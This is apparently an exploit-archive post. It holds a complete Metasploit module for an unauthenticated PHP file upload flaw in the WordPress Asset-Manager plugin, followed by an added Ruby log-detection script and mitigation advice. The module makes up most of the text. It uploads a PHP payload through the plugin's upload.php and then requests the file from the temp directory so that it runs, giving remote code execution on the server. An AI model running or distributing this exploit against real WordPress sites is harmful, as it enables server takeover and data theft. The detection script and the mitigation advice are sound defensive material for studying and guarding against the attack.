WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The upload lands in wp-content/uploads/assets/temp/, where the web server executes it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
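The module above leaves a two-step trace in web server logs: an unauthenticated POST to the plugin's upload.php, then a GET of a .php file under wp-content/uploads/assets/temp/. The following Ruby script is an added detection example, not part of the original post or the Metasploit module; it assumes Apache/nginx combined log format and uses constructed sample lines.

```ruby
require 'time'

# Paths the Asset-Manager upload vulnerability touches (from the module above)
UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/([^/\s?]+\.php)}

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Parses one log line into a hash, or returns nil for lines that do not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns one alert per successful GET of a temp-dir .php that was preceded,
# from the same source IP and within `window` seconds, by a POST to upload.php.
def find_upload_then_exec(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }  # ip => [upload timestamps]
  alerts = []
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_PATH
      uploads[e[:ip]] << e[:ts]
    elsif e[:method] == 'GET' && (m = TEMP_PHP.match(e[:path])) && e[:status] == 200
      if uploads[e[:ip]].any? { |t| (e[:ts] - t).between?(0, window) }
        alerts << { ip: e[:ip], file: m[1], at: e[:ts] }
      end
    end
  end
  alerts
end

# Constructed sample log lines (not real traffic): one attack sequence, two benign requests.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 143 "-" "Mozilla/5.0"
  203.0.113.5 - - [26/May/2012:10:00:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.7 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/img.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  198.51.100.7 - - [26/May/2012:10:06:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  find_upload_then_exec(SAMPLE_LOG.lines).each do |a|
    puts "ALERT #{a[:ip]} executed uploaded file #{a[:file]} at #{a[:at]}"
  end
end
```

The corresponding mitigation is to update the plugin and to deny PHP execution under wp-content/uploads at the web server, so that an uploaded .php file is served as static content rather than run.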